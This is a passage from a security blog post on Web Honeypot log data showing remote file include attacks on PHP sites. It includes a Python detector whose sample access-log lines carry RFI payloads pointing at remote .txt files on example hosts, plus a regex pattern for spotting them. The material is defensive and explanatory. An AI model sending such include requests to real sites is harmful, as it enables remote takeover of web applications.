But other information can be gleaned from the published data, as well. For example, I was looking through the "distinct URL list" and was able to identify numerous legitimate sites that had been compromised, including sports, church, and corporate Websites.
The most obvious trend I saw (after visiting a few of the URLs in the logs) was that most of the compromised sites are primarily Asian sites that host a text file containing PHP code. The attacks target remote "file include" vulnerabilities in PHP Web applications. When exploited, these vulnerabilities cause the application to accept files hosted on other servers and interpret them locally on the victim Web server, which gives the attacker remote control of the application, or sometimes the Web server itself.
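One way to spot these remote file include attempts in a Web server access log, and to build a distinct list of the included URLs from them, is sketched below. This is an added example, not the Web Honeypot project's code; the log lines, hostnames, and function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample access-log lines (Combined Log Format) using reserved example hosts.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2009:04:11:52 +0000] "GET /index.php?page=http://files.example.net/id.txt? HTTP/1.1" 404 210 "-" "libwww-perl/5.805"
198.51.100.23 - - [12/Mar/2009:04:12:03 +0000] "GET /news.php?id=42&ref=home HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2009:04:12:10 +0000] "GET /inc/header.php?root=http%3A%2F%2Ffiles.example.net%2Fid.txt%3F HTTP/1.1" 404 210 "-" "libwww-perl/5.805"
192.0.2.88 - - [12/Mar/2009:05:40:31 +0000] "GET /gallery.php?dir=ftp://media.example.org/r.txt HTTP/1.1" 200 812 "-" "Mozilla/4.0"
198.51.100.23 - - [12/Mar/2009:05:41:00 +0000] "GET /out.php?url=/local/page.html HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

# Client address and request target from a Combined Log Format line.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')
# A parameter value that is itself a remote URL is the signature of a file include attempt.
REMOTE_SCHEME_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def find_rfi_attempts(log_text):
    """Return (client, path, parameter, remote_url) for each parameter carrying a remote URL."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # skip lines that are not well-formed requests
        client, target = m.groups()
        path, _, query = target.partition("?")
        # parse_qsl percent-decodes values, so encoded URLs are caught as well.
        for name, value in parse_qsl(query, keep_blank_values=True):
            value = value.strip()
            if REMOTE_SCHEME_RE.match(value):
                # Drop a trailing "?" so the same hosted file is counted once.
                hits.append((client, path, name, value.rstrip("?")))
    return hits


def distinct_include_urls(hits):
    """Sorted, de-duplicated list of the remotely hosted files that were requested."""
    return sorted({url for _, _, _, url in hits})


if __name__ == "__main__":
    attempts = find_rfi_attempts(SAMPLE_LOG)
    for client, path, name, url in attempts:
        print(f"{client} {path} {name} -> {url}")
    print(distinct_include_urls(attempts))
```

The hosts in the distinct list are often compromised sites themselves, so the list is useful both for blocking outbound fetches from the Web server and for notifying the affected site owners.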
The Web Honeypot project has the potential to provide the security community with some very useful data on attack trends, but it needs volunteers to contribute Web logs. Take a look at the project's site for more information on how to contribute.
John H. Sawyer is a senior security engineer on the IT Security Team at the University of Florida. The views and opinions expressed in this blog are his own and do not represent the views and opinions of the UF IT Security Team or the University of Florida. When John's not fighting flaming, malware-infested machines or performing autopsies on blitzed boxes, he can usually be found hanging with his family, bouncing a baby on one knee and balancing a laptop on the other. Special to Dark Reading.